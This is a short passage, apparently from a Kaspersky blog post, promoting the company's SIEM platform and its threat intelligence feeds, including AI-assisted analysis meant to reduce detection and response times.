What’s more, the analyst has access to other Kaspersky Threat Intelligence data, including information generated using AI technologies and big data analytics. Our threat intelligence databases are continuously updated with the results of manual APT research, live data from the darknet, information from the Kaspersky Security Network, and regular analysis of new malware. All of these technologies help users minimize the potential damage from cyber-incidents and reduce the Mean Time to Respond (MTTR) and the Mean Time to Detect (MTTD).

We continue to improve the usability and performance of our SIEM system, with a focus on deploying AI to free information security employees from even more routine tasks. Follow updates of the Kaspersky Unified Monitoring and Analysis Platform on the official product page.

Kaspersky official blog – ​Read More